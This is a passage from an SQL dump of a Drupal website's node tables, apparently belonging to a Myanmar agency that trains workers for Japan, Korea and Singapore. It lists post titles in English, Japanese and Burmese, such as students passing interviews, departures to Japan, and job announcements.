(119, 537, 'activities', 'ja', 1, 1, 'Congrats THATOE AUNG', 1719399547, 1719399593, 0, 0, 0, 1, 'en', 0),
(120, 539, 'activities', 'en', 1, 1, 'Boss\'s Treatment to celebrate for the interview passed student', 1719399194, 1719399673, 0, 0, 1, NULL, 'und', 0),
(120, 539, 'activities', 'ja', 1, 1, 'Boss\'s Treatment to celebrate for the interview passed student', 1719399678, 1719399772, 0, 0, 0, 1, 'en', 0),
(121, 541, 'activities', 'en', 1, 1, 'Congrats YEE YEE THANT & NAY LIN AUNG ', 1719399666, 1719399822, 0, 0, 1, NULL, 'und', 0),
(121, 541, 'activities', 'ja', 1, 1, 'Congrats YEE YEE THANT & NAY LIN AUNG ', 1719399831, 1719399874, 0, 0, 0, 1, 'en', 0),
(122, 544, 'activities', 'en', 1, 1, '1th Batch Internship in Sushi Resturtant (21-2-2024)', 1719399808, 1719400071, 0, 0, 1, NULL, 'und', 0),
(122, 544, 'activities', 'ja', 1, 1, '1th Batch Internship in Sushi Resturtant (21-2-2024)', 1719400078, 1719400141, 0, 0, 0, 1, 'en', 0),
(123, 545, 'activities', 'en', 1, 1, 'Congrats KHIN YU MON PHYO & THAE EI PHYU ', 1719399955, 1719400104, 0, 0, 1, NULL, 'und', 0),
(123, 545, 'activities', 'ja', 1, 1, 'Congrats KHIN YU MON PHYO & THAE EI PHYU ', 1719400111, 1719400152, 0, 0, 0, 1, 'en', 0),
(124, 547, 'activities', 'en', 1, 1, 'Congrats THURA KYAW', 1719400210, 1719400494, 0, 0, 1, NULL, 'und', 0),
(124, 547, 'activities', 'ja', 1, 1, 'Congrats THURA KYAW', 1719400500, 1719400540, 0, 0, 0, 1, 'en', 0),
(125, 549, 'activities', 'en', 1, 1, 'Congrats MAY THINGYAN HTUN & NAW NAY DAR PALU ', 1719400587, 1719400764, 0, 0, 1, NULL, 'und', 0),
(125, 549, 'activities', 'ja', 1, 1, 'Congrats MAY THINGYAN HTUN & NAW NAY DAR PALU ', 1719400775, 1719400826, 0, 0, 0, 1, 'en', 0),
(126, 551, 'activities', 'en', 1, 1, 'Arrival At Japan(10-4-2024)', 1719400696, 1719400850, 0, 0, 1, NULL, 'und', 0),
(126, 551, 'activities', 'ja', 1, 1, 'Arrival At Japan(10-4-2024)', 1719400855, 1719400888, 0, 0, 0, 1, 'en', 0),
(127, 553, 'activities', 'en', 1, 1, 'Congrats YU WAI PHYO, SOE SANDAR HTWE, PANN EI ZAW', 1719400915, 1719401072, 0, 0, 1, NULL, 'und', 0),
(127, 553, 'activities', 'ja', 1, 1, 'Congrats YU WAI PHYO, SOE SANDAR HTWE, PANN EI ZAW', 1719401079, 1719401205, 0, 0, 0, 1, 'en', 0),
(128, 555, 'activities', 'en', 1, 1, 'Congrats for NAN THAE NU SOE, EI EI MIN, HLAING MEE MEE HTIKE, PYAE SU SU SAN', 1719401448, 1719401644, 0, 0, 1, NULL, 'und', 0),
(128, 555, 'activities', 'ja', 1, 1, 'Congrats for NAN THAE NU SOE, EI EI MIN, HLAING MEE MEE HTIKE, PYAE SU SU SAN', 1719401652, 1719401682, 0, 0, 0, 1, 'en', 0),
(129, 557, 'activities', 'en', 1, 1, 'Congrats KAY THARI TOE, MAY HLA MYO, NILA AUNG', 1719401822, 1719401937, 0, 0, 1, NULL, 'und', 0),
(129, 557, 'activities', 'ja', 1, 1, 'Congrats KAY THARI TOE, MAY HLA MYO, NILA AUNG', 1719401943, 1719401970, 0, 0, 0, 1, 'en', 0),
(130, 559, 'activities', 'en', 1, 1, 'Congrats ', 1719402186, 1719402459, 0, 0, 1, NULL, 'und', 0),
(130, 559, 'activities', 'ja', 1, 1, 'Congrats ', 1719402466, 1719402486, 0, 0, 0, 1, 'en', 0),
(131, 561, 'activities', 'en', 1, 1, 'Congrats to KYAW ZIN LATT', 1719402495, 1719402599, 0, 0, 1, NULL, 'und', 0),
(131, 561, 'activities', 'ja', 1, 1, 'Congrats to KYAW ZIN LATT', 1719402604, 1719402630, 0, 0, 0, 1, 'en', 0),
(132, 563, 'activities', 'en', 1, 1, 'Congratulations YIN MAY THU & YAMIN SHWE ZIN ', 1719474946, 1719478348, 0, 0, 1, NULL, 'und', 0),
(132, 563, 'activities', 'ja', 1, 1, 'Congratulations YIN MAY THU & YAMIN SHWE ZIN ', 1719478395, 1719478496, 0, 0, 0, 1, 'en', 0),
(133, 565, 'activities', 'en', 1, 1, '2nd Batch Pratical class completion', 1719478628, 1719478939, 0, 0, 1, NULL, 'und', 0),
(133, 565, 'activities', 'ja', 1, 1, '2nd Batch Pratical class completion', 1719478947, 1719479062, 0, 0, 0, 1, 'en', 0),
(134, 567, 'activities', 'en', 1, 1, 'Congratulations to 7 peson for Passing Interview! ', 1719478627, 1719479159, 0, 0, 1, NULL, 'und', 0),
(134, 567, 'activities', 'ja', 1, 1, 'Congratulations to 7 peson for Passing Interview! ', 1719479170, 1719479280, 0, 0, 0, 1, 'en', 0),
(135, 569, 'activities', 'en', 1, 1, 'Purpose Of Pratical Training', 1719479321, 1719479477, 0, 0, 1, NULL, 'und', 0),
(135, 569, 'activities', 'ja', 1, 1, 'Purpose Of Pratical Training', 1719479487, 1719479538, 0, 0, 0, 1, 'en', 0),
(136, 571, 'activities', 'en', 1, 1, 'Pratical Nursing Class', 1719479659, 1719479945, 0, 0, 1, NULL, 'und', 0),
(136, 571, 'activities', 'ja', 1, 1, 'Pratical Nursing Class', 1719479949, 1719479981, 0, 0, 0, 1, 'en', 0),
(137, 573, 'activities', 'en', 1, 1, 'Congratulations to NANG BWAR KYI, PHRAY MYAR, KAW MYAR!', 1719479609, 1719480092, 0, 0, 1, NULL, 'und', 0),
(137, 573, 'activities', 'ja', 1, 1, 'Congratulations to NANG BWAR KYI, PHRAY MYAR, KAW MYAR!', 1719480118, 1719480194, 0, 0, 0, 1, 'en', 0),
(138, 575, 'activities', 'en', 1, 1, '1st Batch Speaking and Pratical Class Completion', 1719480211, 1719480344, 0, 0, 1, NULL, 'und', 0),
(138, 575, 'activities', 'ja', 1, 1, '1st Batch Speaking and Pratical Class Completion', 1719480351, 1719480376, 0, 0, 0, 1, 'en', 0),
(139, 577, 'activities', 'en', 1, 1, 'Congratulations HNIN WAH KHAING, LAY LAY NAING!', 1719480203, 1719480485, 0, 0, 1, NULL, 'und', 0),
(139, 577, 'activities', 'ja', 1, 1, 'Congratulations HNIN WAH KHAING, LAY LAY NAING!', 1719480491, 1719480567, 0, 0, 0, 1, 'en', 0),
(140, 579, 'activities', 'en', 1, 1, '1st Batch Theoretical Class For 15 Students', 1719480590, 1719481095, 0, 0, 1, NULL, 'und', 0),
(140, 579, 'activities', 'ja', 1, 1, '1st Batch Theoretical Class For 15 Students', 1719481103, 1719481142, 0, 0, 0, 1, 'en', 0),
(141, 581, 'activities', 'en', 1, 1, 'Congrats EI EI NYEIN , THU ZAR AUNG, BUE MYAR SHAR! ', 1719481335, 1719481555, 0, 0, 1, NULL, 'und', 0),
(141, 581, 'activities', 'ja', 1, 1, 'Congrats EI EI NYEIN , THU ZAR AUNG, BUE MYAR SHAR! ', 1719481567, 1719481622, 0, 0, 0, 1, 'en', 0),
(142, 583, 'activities', 'en', 1, 1, 'Commencement Of New Comet Language Centre', 1719481576, 1719481973, 0, 0, 1, NULL, 'und', 0),
(142, 583, 'activities', 'ja', 1, 1, 'Commencement Of New Comet Language Centre', 1719481977, 1719482002, 0, 0, 0, 1, 'en', 0),
(143, 585, 'activities', 'en', 1, 1, 'Congratulations HNIN WAI WAI NWE & THIDA KHINE! ', 1719481672, 1719482114, 0, 0, 1, NULL, 'und', 0),
(143, 585, 'activities', 'ja', 1, 1, 'Congratulations HNIN WAI WAI NWE & THIDA KHINE! ', 1719482126, 1719482168, 0, 0, 0, 1, 'en', 0),
(144, 587, 'activities', 'en', 1, 1, 'Congratulations to AUNG ZIN OO, HTET WAI AUNG, THAN HTUN NAING! ', 1719482182, 1719482748, 0, 0, 1, 1, 'und', 0),
(144, 587, 'activities', 'ja', 1, 1, 'Congratulations to AUNG ZIN OO, HTET WAI AUNG, THAN HTUN NAING! ', 1719482757, 1719482843, 0, 0, 0, 1, 'en', 0),
(145, 589, 'activities', 'en', 1, 1, 'Congratulations For Getting COE ', 1719568709, 1719568930, 0, 0, 1, NULL, 'und', 0),
(145, 589, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE ', 1719568936, 1719568967, 0, 0, 0, 1, 'en', 0),
(146, 593, 'activities', 'en', 1, 1, 'Congratulations THET HTAR MYINT KO & HSU MYAT HMUE & HNIN YU HLAING & WAI WAI KHAING & CHAW HSU THWE For Passing the Interview', 1719571392, 1719572063, 0, 0, 1, 1, 'und', 0),
(146, 593, 'activities', 'ja', 1, 1, 'Congratulations For Passing the Interview', 1719571765, 1719571826, 0, 0, 0, NULL, 'en', 0),
(147, 595, 'activities', 'en', 1, 1, 'Congratulations KYAW ZIN LATT for getting COE! ', 1719634558, 1719635012, 0, 0, 1, NULL, 'und', 0),
(147, 595, 'activities', 'ja', 1, 1, 'Congratulations KYAW ZIN LATT for getting COE! ', 1719635048, 1719635105, 0, 0, 0, 1, 'en', 0),
(148, 597, 'activities', 'en', 1, 1, 'Congratulations For Getting COE  ', 1719906495, 1719906578, 0, 0, 1, NULL, 'und', 0),
(148, 597, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE  ', 1719906585, 1719906615, 0, 0, 0, 1, 'en', 0),
(149, 598, 'activities', 'en', 1, 1, 'Congratulations For Passing the Interview', 1720081211, 1720081343, 0, 0, 1, 1, 'und', 0),
(150, 600, 'activities', 'en', 1, 1, 'Training about CPR(Kaigo)', 1720081551, 1720082602, 0, 0, 1, NULL, 'und', 0),
(150, 600, 'activities', 'ja', 1, 1, 'Training about CPR(Kaigo)', 1720082607, 1720082636, 0, 0, 0, 1, 'en', 0),
(151, 602, 'activities', 'en', 1, 1, 'Congratulations For Getting COE ', 1720082881, 1720082985, 0, 0, 1, NULL, 'und', 0),
(151, 602, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE ', 1720082990, 1720083010, 0, 0, 0, 1, 'en', 0),
(152, 604, 'activities', 'en', 1, 1, 'Congratulation For Getting COE', 1720244796, 1720246640, 0, 0, 1, NULL, 'und', 0),
(152, 604, 'activities', 'ja', 1, 1, 'Congratulation For Getting COE', 1720246670, 1720246679, 0, 0, 0, 1, 'en', 0),
(153, 606, 'activities', 'en', 1, 1, 'Congratulations For Getting COE ', 1720437398, 1720437572, 0, 0, 1, NULL, 'und', 0),
(153, 606, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE ', 1720437602, 1720437640, 0, 0, 0, 1, 'en', 0),
(154, 609, 'activities', 'en', 1, 1, 'Five Caregiver Workers Departed for Japan under the Specified Skilled Worker (Kaigo) Program', 1781849049, 1781849669, 0, 0, 1, NULL, 'und', 0),
(154, 609, 'activities', 'ja', 1, 1, '特定技能（介護）人材5名 日本出発のお知らせ', 1781849684, 1781850087, 0, 0, 0, 1, 'en', 0),
(155, 611, 'announcement', 'en', 1, 1, 'New Hotel Tokutei Preparation Class Now Open', 1781850513, 1781850827, 0, 0, 1, NULL, 'und', 0),
(155, 611, 'announcement', 'ja', 1, 1, 'ホテル分野 特定技能試験対策クラス開講のお知らせ', 1781852401, 1781853362, 0, 0, 0, 1, 'en', 0),
(156, 613, 'activities', 'en', 1, 1, 'Departure to Japan: Specified Skilled Worker (Food Service Industry)', 1781853965, 1781854366, 0, 0, 1, NULL, 'und', 0),
(156, 613, 'activities', 'ja', 1, 1, '出国報告】特定技能（外食業）で日本へ出発しました', 1781854374, 1781854408, 0, 0, 0, 1, 'en', 0),
(157, 615, 'activities', 'en', 1, 1, 'Group Departure to Japan: Specified Skilled Worker (Food Service Industry)', 1781854816, 1781854858, 0, 0, 0, 1, 'ja', 0),
(157, 615, 'activities', 'ja', 1, 1, '出国報告】特定技能（外食業）で9名が日本へ出発しました', 1781854149, 1781854808, 0, 0, 1, NULL, 'und', 0),
(160, 660, 'activities', 'en', 1, 1, 'Candidate Successfully Passed Tokutei Food Service Interview', 1781857702, 1781868119, 0, 0, 1, 1, 'und', 0),
(160, 660, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のご報告', 1781857818, 1781857849, 0, 0, 0, 1, 'en', 0),
(161, 659, 'activities', 'en', 1, 1, 'Candidate Successfully Passed Tokutei Food Service Interview', 1781857982, 1781868082, 0, 0, 0, NULL, 'ja', 0),
(161, 659, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781857871, 1781868044, 0, 0, 1, NULL, 'und', 0),
(162, 625, 'announcement', 'en', 1, 1, 'Home Care Caregiver Position Available in Aichi, Japan', 1781859433, 1781859579, 0, 0, 1, NULL, 'und', 0),
(162, 625, 'announcement', 'ja', 1, 1, '愛知県 訪問介護スタッフ募集（特定技能・介護）', 1781859590, 1781859626, 0, 0, 0, 1, 'en', 0),
(163, 627, 'announcement', 'en', 1, 1, 'Agriculture Workers Wanted for Tokutei Program in Japan', 1781859859, 1781860124, 0, 0, 1, NULL, 'und', 0),
(163, 627, 'announcement', 'ja', 1, 1, '特定技能（農業）スタッフ募集（茨城県つくば市）', 1781860135, 1781860170, 0, 0, 0, 1, 'en', 0),
(164, 629, 'activities', 'en', 1, 1, 'Hotel Worker Begins Career Journey in Japan', 1781860536, 1781861026, 0, 0, 1, NULL, 'und', 0),
(164, 629, 'activities', 'ja', 1, 1, '特定技能（宿泊）人材 日本出発のお知らせ', 1781861033, 1781861065, 0, 0, 0, 1, 'en', 0),
(165, 631, 'activities', 'en', 1, 1, 'Four Caregiver Workers Departed for Japan', 1781861195, 1781861523, 0, 0, 1, NULL, 'und', 0),
(165, 631, 'activities', 'ja', 1, 1, '特定技能（介護）人材4名 日本出発のお知らせ', 1781861533, 1781861571, 0, 0, 0, 1, 'en', 0),
(166, 634, 'activities', 'en', 1, 1, 'Candidate Successfully Passed Tokutei Hotel Interview', 1781861811, 1781861912, 0, 0, 1, NULL, 'und', 0),
(166, 634, 'activities', 'ja', 1, 1, '特定技能（宿泊）面接合格のお知らせ', 1781861919, 1781861949, 0, 0, 0, 1, 'en', 0),
(167, 636, 'activities', 'en', 1, 1, 'Four Food Service Workers Departed for Japan', 1781862000, 1781862136, 0, 0, 1, NULL, 'und', 0),
(167, 636, 'activities', 'ja', 1, 1, '特定技能（外食業）人材4名 日本出発のお知らせ', 1781862148, 1781862182, 0, 0, 0, 1, 'en', 0),
(168, 638, 'activities', 'en', 1, 1, 'Candidate Successfully Passed Tokutei Hotel Interview', 1781862296, 1781862436, 0, 0, 1, NULL, 'und', 0),
(168, 638, 'activities', 'ja', 1, 1, '特定技能（宿泊）面接合格のお知らせ', 1781862442, 1781862475, 0, 0, 0, 1, 'en', 0),
(169, 640, 'activities', 'en', 1, 1, 'Three Caregiver Workers Departed for Japan', 1781862612, 1781862777, 0, 0, 1, NULL, 'und', 0),
(169, 640, 'activities', 'ja', 1, 1, '特定技能（介護）人材3名 日本出発のお知らせ', 1781862788, 1781862822, 0, 0, 0, 1, 'en', 0),
(170, 642, 'activities', 'en', 1, 1, 'Candidate Successfully Passed Tokutei Kaigo Interview', 1781862997, 1781864070, 0, 0, 1, NULL, 'und', 0),
(170, 642, 'activities', 'ja', 1, 1, '特定技能（介護）面接合格のお知らせ', 1781864135, 1781864161, 0, 0, 0, 1, 'en', 0),
(171, 644, 'activities', 'en', 1, 1, 'Caregiver Begins New Career Journey in Japan', 1781864280, 1781864827, 0, 0, 1, NULL, 'und', 0),
(171, 644, 'activities', 'ja', 1, 1, '特定技能（介護）人材 日本出発のお知らせ', 1781864833, 1781864863, 0, 0, 0, 1, 'en', 0),
(173, 648, 'activities', 'en', 1, 1, 'Nine Food Service Workers Begin Their New Careers in Japan', 1781865504, 1781865730, 0, 0, 1, NULL, 'und', 0),
(173, 648, 'activities', 'ja', 1, 1, '特定技能（外食業）人材9名 新たなキャリアへの出発', 1781865746, 1781865800, 0, 0, 0, 1, 'en', 0),
(174, 650, 'activities', 'en', 1, 1, 'A New Opportunity Begins in Japan\'s Food Service Industry', 1781865879, 1781866082, 0, 0, 1, NULL, 'und', 0),
(174, 650, 'activities', 'ja', 1, 1, '特定技能（外食業）人材 日本での新たなスタート', 1781866096, 1781866126, 0, 0, 0, 1, 'en', 0),
(175, 652, 'activities', 'en', 1, 1, 'Starting a New Journey in Japan\'s Food Service Industry', 1781866201, 1781866452, 0, 0, 1, NULL, 'und', 0),
(175, 652, 'activities', 'ja', 1, 1, '特定技能（外食業）人材 日本での新たな挑戦', 1781866462, 1781866535, 0, 0, 0, 1, 'en', 0),
(176, 654, 'activities', 'en', 1, 1, 'Two Food Service Workers Set Off for Japan', 1781866742, 1781866853, 0, 0, 1, NULL, 'und', 0),
(176, 654, 'activities', 'ja', 1, 1, '特定技能（外食業）人材2名 日本出発のお知らせ', 1781867329, 1781867363, 0, 0, 0, 1, 'en', 0),
(177, 656, 'activities', 'en', 1, 1, 'Food Service Worker Begins a New Chapter in Japan', 1781867430, 1781867563, 0, 0, 1, NULL, 'und', 0),
(177, 656, 'activities', 'ja', 1, 1, '特定技能（外食業）人材 日本での新たな一歩', 1781867579, 1781867606, 0, 0, 0, 1, 'en', 0),
(178, 662, 'activities', 'en', 1, 1, 'A Successful Step Toward a Caregiving Career in Japan', 1781868157, 1781868217, 0, 0, 1, NULL, 'und', 0),
(178, 662, 'activities', 'ja', 1, 1, '特定技能（介護）面接合格のお知らせ', 1781869786, 1781869820, 0, 0, 0, 1, 'en', 0),
(179, 664, 'activities', 'en', 1, 1, 'Successful Food Service Interview Result', 1781869947, 1781870011, 0, 0, 1, NULL, 'und', 0),
(179, 664, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781870019, 1781870056, 0, 0, 0, 1, 'en', 0),
(180, 667, 'activities', 'en', 1, 1, 'Food Service Candidate Achieves Interview Success', 1781870098, 1781870198, 0, 0, 1, NULL, 'und', 0),
(180, 667, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781870203, 1781870229, 0, 0, 0, 1, 'en', 0),
(181, 669, 'activities', 'en', 1, 1, 'Student Successfully Passed JLPT N3 Examination', 1781870291, 1781870377, 0, 0, 1, NULL, 'und', 0),
(181, 669, 'activities', 'ja', 1, 1, 'JLPT N3合格のお知らせ', 1781870453, 1781870480, 0, 0, 0, 1, 'en', 0),
(182, 671, 'activities', 'en', 1, 1, 'From N5 to N3: A Successful Learning Journey', 1781870511, 1781870596, 0, 0, 1, NULL, 'und', 0),
(182, 671, 'activities', 'ja', 1, 1, 'N5からN3へ ― 学習成果のご報告', 1781870603, 1781870629, 0, 0, 0, 1, 'en', 0),
(183, 673, 'activities', 'en', 1, 1, 'JLPT N3 Success Opens New Opportunities', 1781870655, 1781870746, 0, 0, 1, NULL, 'und', 0),
(183, 673, 'activities', 'ja', 1, 1, 'JLPT N3合格により広がる新たな可能性', 1781870753, 1781870783, 0, 0, 0, 1, 'en', 0),
(184, 675, 'activities', 'en', 1, 1, 'Two Food Service Workers Depart for Japan After Months of Preparation', 1781870885, 1781871015, 0, 0, 1, NULL, 'und', 0),
(184, 675, 'activities', 'ja', 1, 1, '特定技能（外食業）人材2名 日本出発のお知らせ', 1781871026, 1781871059, 0, 0, 0, 1, 'en', 0),
(185, 678, 'activities', 'en', 1, 1, 'Food Service Candidate Successfully Advances to the Next Stage', 1781871092, 1781871263, 0, 0, 1, NULL, 'und', 0),
(185, 678, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781871269, 1781871303, 0, 0, 0, 1, 'en', 0),
(186, 680, 'activities', 'en', 1, 1, 'Food Service Candidate Demonstrates Readiness for a Career in Japan', 1781871381, 1781871431, 0, 0, 1, NULL, 'und', 0),
(186, 680, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781871439, 1781871464, 0, 0, 0, 1, 'en', 0),
(187, 682, 'activities', 'en', 1, 1, 'A Promising Future Begins with Interview Success', 1781927778, 1781927919, 0, 0, 1, NULL, 'und', 0),
(187, 682, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781927928, 1781927973, 0, 0, 0, 1, 'en', 0),
(188, 684, 'activities', 'en', 1, 1, 'Successful Interview Result for a Future Caregiver in Japan', 1781929358, 1781929622, 0, 0, 1, NULL, 'und', 0),
(188, 684, 'activities', 'ja', 1, 1, '特定技能（介護）面接合格のお知らせ', 1781929630, 1781929703, 0, 0, 0, 1, 'en', 0),
(189, 686, 'activities', 'en', 1, 1, 'Commitment and Dedication Lead to Interview Success', 1781929873, 1781930057, 0, 0, 1, NULL, 'und', 0),
(189, 686, 'activities', 'ja', 1, 1, '特定技能（介護）面接合格のお知らせ', 1781931645, 1781931678, 0, 0, 0, 1, 'en', 0),
(190, 689, 'activities', 'en', 1, 1, 'Preparation and Determination Lead to Interview Success', 1781931692, 1781932260, 0, 0, 1, 1, 'und', 0),
(190, 689, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781932145, 1781932181, 0, 0, 0, NULL, 'en', 0),
(191, 691, 'activities', 'en', 1, 1, 'Hard Work Recognized Through Interview Success', 1781932270, 1781932388, 0, 0, 1, NULL, 'und', 0),
(191, 691, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781932395, 1781932417, 0, 0, 0, 1, 'en', 0),
(192, 693, 'activities', 'en', 1, 1, 'Persistence and Dedication Result in Interview Success', 1781932475, 1781932531, 0, 0, 1, NULL, 'und', 0),
(192, 693, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781932582, 1781932608, 0, 0, 0, 1, 'en', 0),
(193, 696, 'activities', 'en', 1, 1, 'Interview Success Marks the Beginning of New Opportunities', 1781932655, 1781933525, 0, 0, 1, 1, 'und', 0),
(193, 696, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781932761, 1781932799, 0, 0, 0, 1, 'en', 0),
(194, 698, 'activities', 'en', 1, 1, 'Successful Interview Opens the Door to International Experience', 1781933649, 1781936787, 0, 0, 1, NULL, 'und', 0),
(194, 698, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781936795, 1781936828, 0, 0, 0, 1, 'en', 0),
(195, 700, 'activities', 'en', 1, 1, 'Building Skills and Opportunities Through Success', 1781937042, 1781937183, 0, 0, 1, NULL, 'und', 0),
(195, 700, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781937192, 1781937232, 0, 0, 0, 1, 'en', 0),
(196, 702, 'activities', 'en', 1, 1, 'Determination Leads to Interview Success', 1781937254, 1781937623, 0, 0, 1, NULL, 'und', 0),
(196, 702, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781937674, 1781937768, 0, 0, 0, 1, 'en', 0),
(197, 704, 'activities', 'en', 1, 1, 'Interview Success Opens New Possibilities in Japan', 1781937800, 1781938112, 0, 0, 1, NULL, 'und', 0),
(197, 704, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781938122, 1781938160, 0, 0, 0, 1, 'en', 0),
(198, 706, 'activities', 'en', 1, 1, 'A Significant Achievement Toward a Career in Japan', 1781938328, 1781938542, 0, 0, 1, NULL, 'und', 0),
(198, 706, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781938666, 1781938704, 0, 0, 0, 1, 'en', 0),
(199, 708, 'activities', 'en', 1, 1, 'Turning Effort into Success: Interview Passed', 1781938732, 1781938836, 0, 0, 1, NULL, 'und', 0),
(199, 708, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781938842, 1781938891, 0, 0, 0, 1, 'en', 0),
(200, 710, 'activities', 'en', 1, 1, 'Ready for the Next Challenge: Interview Successfully Passed', 1781938915, 1781939019, 0, 0, 1, NULL, 'und', 0),
(200, 710, 'activities', 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781939025, 1781939058, 0, 0, 0, 1, 'en', 0),
(204, 720, 'language_center', 'en', 1, 2, 'Title 1', 1787752664, 1787838595, 0, 0, 0, NULL, 'ja', 0),
(204, 720, 'language_center', 'ja', 1, 2, 'Title 1', 1787750997, 1787838595, 0, 0, 1, NULL, 'und', 0),
(205, 721, 'language_center', 'en', 1, 2, 'Title 2', 1787752645, 1787838627, 0, 0, 0, NULL, 'ja', 0),
(205, 721, 'language_center', 'ja', 1, 2, 'Title 2', 1787752359, 1787838627, 0, 0, 1, NULL, 'und', 0),
(206, 723, 'language_center', 'ja', 1, 2, 'Title 3', 1787838799, 1787923046, 0, 0, 1, 1, 'und', 0);

-- --------------------------------------------------------

--
-- Table structure for table `node_field_revision`
--

CREATE TABLE `node_field_revision` (
  `nid` int UNSIGNED NOT NULL,
  `vid` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `status` tinyint NOT NULL,
  `uid` int UNSIGNED NOT NULL COMMENT 'The ID of the target entity.',
  `title` varchar(255) DEFAULT NULL,
  `created` int DEFAULT NULL,
  `changed` int DEFAULT NULL,
  `promote` tinyint DEFAULT NULL,
  `sticky` tinyint DEFAULT NULL,
  `default_langcode` tinyint NOT NULL,
  `revision_translation_affected` tinyint DEFAULT NULL,
  `content_translation_source` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `content_translation_outdated` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The revision data table for node entities.';

--
-- Dumping data for table `node_field_revision`
--

INSERT INTO `node_field_revision` (`nid`, `vid`, `langcode`, `status`, `uid`, `title`, `created`, `changed`, `promote`, `sticky`, `default_langcode`, `revision_translation_affected`, `content_translation_source`, `content_translation_outdated`) VALUES
(1, 1, 'en', 1, 1, 'About Us', 1687235565, 1687235804, 0, 0, 1, 1, 'und', 0),
(1, 2, 'en', 1, 1, 'About Us', 1687235565, 1687236130, 0, 0, 1, 1, 'und', 0),
(3, 6, 'en', 1, 1, 'စင်္ကာပူနိုင်ငံရှိ ဆောက်လုပ်ရေးလုပ်ငန််းတွင် General Worker ဖြင့် အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသော ၀န်ထမ်း (၅)ဦး အမြန်အလိုရှိပါတယ်။', 1687238109, 1687238173, 0, 0, 1, 1, 'und', 0),
(4, 7, 'en', 1, 1, 'ကိုရီးယားသင်္ဘောကျင်းတွင် Electrical Engineer ဖြင့် အလုပ်သွားရောက် အလုပ်လုပ်ကိုင်ချင်သော ကျွမ်းကျင် အင်ဂျင်နီယာများ အမြန်အလိုရှိပါသည်။', 1687238298, 1687238319, 0, 0, 1, 1, 'und', 0),
(4, 8, 'en', 1, 1, 'ကိုရီးယားသင်္ဘောကျင်းတွင် Electrical Engineer ဖြင့် အလုပ်သွားရောက် အလုပ်လုပ်ကိုင်ချင်သော ကျွမ်းကျင် အင်ဂျင်နီယာများ အမြန်အလိုရှိပါသည်။', 1687238298, 1687238357, 0, 0, 1, NULL, 'und', 0),
(3, 9, 'en', 1, 1, 'စင်္ကာပူနိုင်ငံရှိ ဆောက်လုပ်ရေးလုပ်ငန်းတွင် General Worker ဖြင့် အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသော ၀န်ထမ်း (၅)ဦး အမြန်အလိုရှိပါတယ်။', 1687238109, 1687238428, 0, 0, 1, 1, 'und', 0),
(5, 10, 'en', 1, 1, 'စင်္ကာပူနိုင်ငံရှိ ဆောက်လုပ်ရေးလုပ်ငန်းတွင် General Worker ဖြင့် အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသော ၀န်ထမ်း (၅)ဦး အမြန်အလိုရှိပါတယ်။', 1687238451, 1687238503, 0, 0, 1, 1, 'und', 0),
(6, 11, 'en', 1, 1, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော်စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်းပြောကြား', 1687240083, 1687240557, 0, 0, 1, 1, 'und', 0),
(7, 12, 'en', 1, 1, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1687240759, 1687240947, 0, 0, 1, 1, 'und', 0),
(8, 13, 'en', 1, 1, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင်ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက်လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1687240986, 1687241381, 0, 0, 1, 1, 'und', 0),
(9, 14, 'en', 1, 1, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1687241497, 1687241885, 0, 0, 1, 1, 'und', 0),
